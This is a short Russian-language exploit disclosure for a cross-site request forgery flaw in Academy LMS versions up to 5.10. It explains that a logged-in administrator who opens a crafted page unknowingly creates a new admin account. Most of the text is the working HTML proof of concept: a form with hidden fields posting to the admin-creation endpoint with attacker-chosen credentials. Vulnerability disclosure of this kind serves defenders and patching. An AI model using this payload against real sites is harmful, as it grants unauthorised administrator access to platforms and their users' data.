
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS — это приложение, где пользователи могут создавать и рекламировать курсы. Возможность добавления нового административного пользователя уязвима для CSRF, что позволяет с помощью социальной инженерии получить доступ администратора к платформе.
#Подтверждение концепции (POC) Первым шагом в нашем подтверждении концепции является аутентификация на платформе с правами администратора.
После этого просто откройте страницу, содержащую код эксплуатации уязвимости, и вы увидите, что в систему был добавлен новый административный пользователь.
Код, использованный в эксплойте:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>